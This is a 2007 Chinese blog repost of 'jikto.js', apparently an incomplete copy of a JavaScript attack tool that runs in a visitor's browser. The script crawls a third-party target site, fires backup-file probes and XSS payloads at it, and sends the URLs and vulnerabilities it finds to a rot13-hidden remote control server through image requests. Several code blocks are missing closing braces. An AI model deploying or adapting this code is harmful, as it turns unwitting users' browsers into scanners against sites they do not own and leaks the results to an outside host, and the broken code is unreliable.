[转] 貌似不完整的 jikto.js

//------------------------------------------------------------------------------------ Analyzer

function linkIsGood(l) {

var lower = l.toLowerCase().substring(0,4);

//this is stupid (could false pos), but effective

if(lower == "java" || lower == "mail") {

return false;

}

var tmpU = Url.resolveRelativeLink(currRequest.url, l);

//do checks here

if(!fileExtAllowed(tmpU)) {

return false;

}

if(tmpU.hostname != startUrl.hostname) {

return false;

}

if(tmpU.port != startUrl.port) {

return false;

}

return true;

}

function extractHREFsAsRequests(txt) {

var pattern = /href\s*\=\s*(["'])([^'"]*)\1/gi;

var links = new Array();

var result;

while( (result = pattern.exec(txt)) != null) {

links.push(result[2]);

}

//refine what we RegExed out

var requests = new Array();

var counter = 0;

var linklen = links.length;

for(; counter < linklen; counter++) {

//clean out the prefix

links[counter] = links[counter].replace(prefix,"");

if(linkIsGood(links[counter])) {

requests.push( Request.fromUrl( Url.resolveRelativeLink(currRequest.url, links[counter]) ));

}

return requests;

}

function fileExtAllowed(u) {

for(var i=0, bfl = badFiles.length; i < bfl; i++) {

if(u.fileext.toLowerCase() == badFiles[i]) {

return false;

}

return true;

}

function tagParser(text) {

var PRENAME = 0;

var INNAME = 1;

var INPREVALUE = 2;

var INVALUE = 3;

var attribs = new Object();

var curr = 0;

var len = text.length;

var c = "";

var state = PRENAME;

var buff = "";

var name = "";

var quoteChar = "";

while(curr < text.length) {

c = text.charAt(curr);

switch(state) {

case PRENAME:

switch(c) {

case ' ':

case '\t':

case '\r':

case '\n':

curr++;

break;

default:

buff = c;

curr++;

state = INNAME;

break;

}

break;

case INNAME:

switch(c) {

case '=':

//= so name is done

name = trim(buff).toLowerCase();

buff = "";

quoteChar = "";

curr++;

state = INPREVALUE;

break;

default:

buff += c;

curr++;

break;

}

break;

case INPREVALUE:

switch(c) {

case ' ':

case '\t':

//ignore it

curr++;

break;

case "\'":

case "\"":

quoteChar = c;

curr++;

state = INVALUE;

break;

default:

//anything is a value

quoteChar = "";

buff += c;

curr++;

state = INVALUE;

break;

}

break;

case INVALUE:

switch(c) {

case quoteChar:

//all done!

attribs[name] = buff;

state = PRENAME;

curr++;

buff = "";

break;

case ' ':

case '\t':

case '\r':

case '\n':

if(quoteChar == "") {

attribs[name] = buff;

state = PRENAME;

buff = "";

}

curr++;

break;

default:

buff += c;

curr++;

break;

}

break;

} //end switch

} //end while

var c = 10;

return attribs;

}

function extractFormsAsRequests(txt) {

var requests = new Array();

var lowertxt = txt.toLowerCase();

//RegEx and results for FORM search

var pattern = /<form\s+([^>]+)/gi;

var result;

while( (result = pattern.exec(txt)) != null) {

//parse out attributes for the form tag

currForm = tagParser(result[1]);

//setup something for the inputs

currForm.inputs = new Array();

//find the "end" tag

var endp = lowertxt.indexOf("</form", result.index+1);

//grab all that text "inside" thos form

var inner = txt.substring(result.index, endp);

//grab all the inputs in the form

var pattern2 = /<input\s+([^>]+)/gi;

var result2;

while( (result2 = pattern2.exec(inner)) != null) {

//parse out the attributes

currForm.inputs[currForm.inputs.length] = tagParser(result2[1]);

}

//needs some inputs and an action

if(currForm.inputs.length > 0 && currForm.action != undefined) {

if(linkIsGood(currForm.action)) {

var u = Url.resolveRelativeLink(currRequest.url, currForm.action);

if(currForm.method != undefined && currForm.method.toLowerCase() == "post") {

var req = Request.fromUrl(u);

req.method = "POST";

req.data = buildParamString(currForm.inputs);

requests[requests.length] = req;

} else {

u.queryParams = buildParamString(currForm.inputs);

requests[requests.length] = Request.fromUrl(u);

}

return requests;

}

function buildParamString(inps) {

var ret = new Array();

var seen = new Object();

for(var i =0; i < inps.length; i++) {

if(inps[i].name != undefined && seen[inps[i].name] == undefined) {

seen[inps[i].name] = true;

if(inps[i].value != undefined) {

ret[ret.length] = new NVPair(inps[i].name, inps[i].value);

} else {

ret[ret.length] = new NVPair(inps[i].name, "admin");

}

return ret;

}

//------------------------------------------------------------------------------------ Attack Lib

function generateBackupAttacks(request) {

var requests = new Array();

var newreq = new cloneObject(request);

newreq.url.filename += ".bak";

newreq.url.queryParams = new Array();

newreq.data = "";

newreq.method = "GET";

newreq.origin = "audit";

newreq.title = "Backup File Detected!";

newreq.sev = 50;

newreq.regex = /HTTP\/1.1\s200\sOK/i;

requests[requests.length] = newreq;

var newreq = new cloneObject(request);

newreq.url.filename += ".old";

newreq.url.queryParams = new Array();

newreq.data = "";

newreq.method = "GET";

newreq.origin = "audit";

newreq.title = "Backup File Detected!";

newreq.sev = 50;

newreq.regex = /HTTP\/1.1\s200\sOK/i;

requests[requests.length] = newreq;

return requests;

}

function generatePPASSAttacks(request) {

var requests = new Array();

if(request.method == "GET" && request.url.queryParams.length > 0) {

var newreq = new cloneObject(request);

newreq.url.queryParams = new Array();

for(var xxx=0; xxx < request.url.queryParams.length; xxx++) {

newreq.url.queryParams[xxx] = new NVPair(request.url.queryParams[xxx].name,"<script>alert('xss')</script>");

}

newreq.origin = "audit";

newreq.title = "Cross Site Scripting";

newreq.sev = 100;

newreq.regex = /script/i;

requests[requests.length] = newreq;

} else if(request.method == "POST") {

var t = request.data.length > 0;

var newreq = new cloneObject(request);

newreq.url.queryParams = new Array();

newreq.data = new Array();

newreq.data[0] = new NVPair("admin", "<script>alert('xss')</script>");

newreq.data[1] = new NVPair("password", "<script>alert('xss')</script>");

newreq.data[2] = new NVPair("graphicOption", "<script>alert('xss')</script>");

newreq.origin = "audit";

newreq.title = "Cross Site Scripting";

newreq.sev = 100;

newreq.regex = /script/i;

requests[requests.length] = newreq;

}

return requests;

}

//------------------------------------------------------------------------------------ Global Variables

var currRequest = null;

var currResponse = null;

//startURL!

var GUIURL = rot13("uggc://jjj.cragrfg.vg/wvxgb/pbageby.gkg"); //http://www.pentest.it/jikto/control.txt //http://localhost/JiktoControl/Collect.aspx?type=

//uggc://ybpnyubfg/WvxgbPbageby/Pbyyrpg.nfck?glcr=

var SLASH = String.fromCharCode(47);

//prefix for our requests

var prefix = window.location.pathname.substr(0,window.location.pathname.indexOf("http:", 7))

//image extensions

var badFiles = ["jpg", "jpeg", "gif", "png", "ico", "psd", "xcf", "xmb", "svg", "wmv", "bmp", "pdf", "ps", "doc", "dot", "xls", "pot", "ppt", "avi", "mpeg", "mpg", "asf", "mov", "wmv", "rm", "mp2", "mp3", "wma", "wav", "aiff", "aif", "mid", "midi", "mp4", "au", "ra", "exe", "pif", "bat", "msi", "swf", "class", "sh", "zip", "gz", "tar", "rar", "z", "jar", "cab", "rpm"];

//our requestor!

var xhr= new XMLHttpRequest();

//------------------------------------------------------------------------------------ GUI Interface

//alert("GUI");

function reportURL(method, url) {

var i = new Image();

i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);

}

function reportVuln(method, url, sev, title, req, resp) {

var i = new Image();

i.src = GUIURL + "2&url=" + escape(url) + "&method=" + escape(method)+ "&sev=" + escape(sev) +"&title=" + escape(title) +"&req=" + escape(req) + "&resp=" + escape(resp);

}

//------------------------------------------------------------------------------------ Misc Funcs

function cloneObject(what) {

for (var i in what) {

if(typeof(what[i]) == "object") {

this[i] = new cloneObject(what[i]);

} else {

this[i] = what[i];

}

function rot13(txt) {

var ret =""

var len = txt.length;

for(var i=0; i < len; i++) {

var b = txt.charCodeAt(i);

if( ((b>64) && (b<78)) || ((b>96) && (b<110)) ) {

b +=13;

} else if( ((b>77) && (b<91)) || ((b>109) && (b<123)) ) {

b -=13;

}

ret += String.fromCharCode(b);

}

return ret;

}

function trim(s) {

return s.replace(/^\s*(\S*(\s+\S+)*)\s*$/, "$1");

}

//------------------------------------------------------------------------------------ Request

function Request() {

this.url = null;

this.method = "";

this.origin = "crawl";

this.data = "";

this.title = "xx";

this.regex = "";

this.sev = 0;

}

Request.fromUrl = function(u) {

var ret = new Request();

ret.url = u;

ret.method = "GET";

ret.origin = "crawl";

return ret;

}

Request.prototype.getResource = function () {

return this.url.toString();

}

Request.prototype.toString = function () {

return String.concat(this.method, " ", this.getResource(), " HTTP/1.1");

}

//------------------------------------------------------------------------------------ Response

//create a response object from a completely returned XHR obj!

function Response(x) {

this.status = x.status;

this.statusText = x.statusText;

this.is404 = false;

this.headersString = x.getAllResponseHeaders();

//extract the headers into a hash table

this.headers = new Object();

var tmp = this.headersString.split("\n");

var j;

var k = ": ";

for(var i =0; i < tmp.length; i++) {

j = tmp[i].indexOf(k);

if(j > 0) {

this.headers[tmp[i].substring(0, j)] = tmp[i].substring(j + 2, tmp[i].length);

}

this.body = x.responseText;

return this;

}

function Response_toString() {

var s="";

var i;

s = String.concat(s, "HTTP/1.1 ", this.status, " ", this.statusText, "\n");

for (i in this.headers) {

s = String.concat(s, i, ": ", this.headers[i], "\n");

}

s = String.concat(s, this.data);

return s;

}

Response.prototype.toString = Response_toString;

//------------------------------------------------------------------------------------ Scanner

var pending = new Object();

var pendingLen = 0;

var visited = new Object();

function addRequest(r) {

if(r != undefined) {

if(pending[r.toString()] == undefined) {

if(visited[r.toString()] == undefined) {

pending[r.toString()] = r;

pendingLen++;

return true;

}

return false;

}

function processResponse() {

// only if req shows "loaded"

if (xhr.readyState == 4) {

//send reponse off

currResponse = new Response(xhr);

if(currResponse.status == 200) {

reportURL(currRequest.method, currRequest.getResource());

}

var requests = null;

//grab any requests from HREFs

requests = extractHREFsAsRequests(currResponse.body);

var requests2 = extractFormsAsRequests(currResponse.body);

if(requests2.length > 0) {

requests = requests.concat(requests2);

}

if(requests.length > 0) {

//bubble up the GUI and add them (if needed)

for(var i =0; i < requests.length; i++)

{

addRequest(requests[i]);

//================= Generate Attacks

requests2 = generateBackupAttacks(requests[i]);

//requests2 = (generatePPASSAttacks(requests[i]));

requests2 = requests2.concat(generatePPASSAttacks(requests[i]));

if(requests2.length > 0) {

for(var k =0; k < requests2.length; k++)

{

addRequest(requests2[k]);

}

if(xhr.responseText.indexOf("xss") > 0) {

reportVuln(currRequest.method, currRequest.getResource(), 100, "Cross Site Scripting", currRequest.toString(), currResponse.toString());

}

//==============score attacks here

if(currRequest.origin == "audit") {

if(currResponse.toString().match(currRequest.regex)) {

reportVuln(currRequest.method, currRequest.getResource(), currRequest.sev, currRequest.title, currRequest.toString(), currResponse.toString());

}

sendNextRequest();

}

function sendNextRequest() {

if(pendingLen == 0) {

//toGUI("Scan Complete!");

return true;

}

//grab the first Request

for(i in pending) {

currRequest = pending[i];

break;

}

//remove it from the queue

delete pending[currRequest.toString()];

pendingLen--;

//add it to visited

visited[currRequest.toString()] = true;

//clear out the old response obj

currResponse = null;

xhr = new XMLHttpRequest();

var data = "";

//register the handler function

xhr.onreadystatechange = processResponse;

xhr.open(currRequest.method, prefix + currRequest.getResource(), true);

if(currRequest.method == "POST") {

data = currRequest.data.join("&");

xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

xhr.setRequestHeader("Content-length", data.length);

//http.setRequestHeader("Connection", "close");

}

//add our magic header

xhr.setRequestHeader('X-Hax0r', 'Acidus');

xhr.send(data);

}

//------------------------------------------------------------------------------------ URL Object

function NVPair(n, v) {

this.name = n;

this.value = v;

return this;

}

NVPair.prototype.toString = function() {

return String.concat(escape(this.name), "=", escape(this.value));

}

function setParamValue(name, value, ar) {

for (var yyy in ar.length) {

if(ar[yyy].name != undefined) {

if(ar[yyy].name == name) {

ar[yyy].value = value;

break;

}

return ar;

}

function getParamArray(qs) {

var ret = new Array();

var nvp = qs.split("&");

for(var i=0; i < nvp.length; i++) {

var tmp = nvp[i].split("=");

if(tmp.length == 1) {

ret[ret.length] = new NVPair(unescape(tmp[0]), "");

} else if(tmp.length == 2) {

ret[ret.length] = new NVPair(unescape(tmp[0]), unescape(tmp[1]));

}

return ret;

}

function Url(url) {

this.protocol = "";

this.hostname = "";

this.port = "";

this.path = "";

this.filename="";

this.fileext="";

this.frag ="";

this.queryParams = new Array();

if(arguments.length == 1) {

var tmp;

var rest;

//grab the fraq

tmp = url.split("#");

rest = tmp[0];

this.frag= (tmp.length > 1) ? unescape(String.concat("#",tmp[1])) : "";

//grab the query string

tmp = rest.split("?");

rest = tmp[0];

if(tmp.length > 1) {

this.queryParams = getParamArray(tmp[1]);

}

//grab the protocol

tmp = rest.split("//");

if(tmp.length > 1) {

tmp[0] = unescape(tmp[0]);

this.protocol = tmp[0].substring(0,tmp[0].length-1).toLowerCase();

rest = tmp[1];

} else {

//alert("Invalid url \"" + url + "\"");

throw "Invalid URL";

}

//grab the host

tmp = rest.split(SLASH);

if(tmp.length > 1) {

//get rid of hostname

this.hostname = unescape(tmp.shift()).toLowerCase();

//only 1 thing left, which is the filename

if(tmp.length == 1) {

this.filename = unescape(tmp[0]);

this.path = SLASH;

} else {

//filename is at the end

this.filename = unescape(tmp.pop());

//recombine and add leading and trailing slashes

for(var i =0; i < tmp.length; i++) {

tmp[i] = unescape(tmp[i]);

}

for(var i = 0; i < tmp.length; i++) {

if(tmp[i] == ".") {

tmp.splice(i, 1);

i = i -1;

} else if(tmp[i] == "..") {

if(i == 0) {

//more /../ than directories

//alert("Invalid url \"" + url + "\"");

throw "Invalid URL";

}

tmp.splice(i-1, 2);

i=i-2;

}

if(tmp.length >=1) {

this.path = String.concat(SLASH, tmp.join(SLASH), SLASH);

} else {

this.path = SLASH;

}

} else {

this.hostname = unescape(tmp[0]);

this.path = SLASH;

}

//grab the port

tmp = this.hostname.split(":");

this.hostname = tmp[0];

this.port = (tmp.length == 2) ? unescape(tmp[1]) : "";

//be smart and fill in the port as needed

if(this.port.length == 0) {

if(this.protocol == "http")

this.port = "80";

else

this.port = "443";

}

//grab the filename extension

if(this.filename.length > 0) {

tmp = this.filename.split(".");

this.fileext = (tmp.length > 1) ? tmp.pop() : "";

}

return this;

}

Url.prototype.addNV = function(name, value) {

this.queryParams[this.queryParams.length] = new NVPair(name, value);

}

function Url_resolveRelativeLink(baseUrl, relativeLink) {

if(typeof(baseUrl) == "string") {

baseUrl = new Url(baseUrl);

}

//is it relative?

if(unescape(relativeLink).indexOf("://") > 0) {

return new Url(relativeLink);

}

//alert("BASE IS: " + baseUrl);

var s;

//set up our base

s = String.concat(baseUrl.protocol,

"://",

baseUrl.hostname,

(baseUrl.port.length > 0) ? ":" + baseUrl.port : "");

if(relativeLink.substring(0,1) == SLASH) {

//link is relative to site root, so directly concat

s = String.concat(s, relativeLink);

} else {

//link is relative to current path

s = String.concat(s, baseUrl.path, relativeLink);

}

return new Url(s);

}

function Url_toString() {

return String.concat(this.protocol,

"://",

this.hostname,

(this.port.length > 0) ? ":" + this.port : "",

this.path,

this.filename,

(this.queryParams.length > 0) ? "?" + this.queryParams.join("&") : "",

this.frag);

}

function Url_toStringNoPath() {

return String.concat(this.protocol,

"://",

this.hostname,

(this.port.length > 0) ? ":" + this.port : "");

}

Url.prototype.toString = Url_toString;

Url.prototype.toStringNoPath = Url_toStringNoPath;

Url.resolveRelativeLink = Url_resolveRelativeLink;

//------------------------------------------------------------------------------------------------------------------------------------------------------------------------

//var startUrlString = rot13("uggc://mreb.jronccfrphevgl.pbz/");

var startUrlString = rot13("uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc"); //http://blackhat-forums.com/phpBB2/index.php uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc

//var startUrlString = rot13("");

var startUrl = new Url(startUrlString);

//queue up first request

addRequest(Request.fromUrl(startUrl));

//let 'er rip!

sendNextRequest();

posted @ 2007-07-12 09:35 temptation 阅读(980) 评论(0) 编辑收藏举报

刷新页面返回顶部

Temptation

寻道之路 , 与您同行 !

[转] 貌似不完整的 jikto.js

公告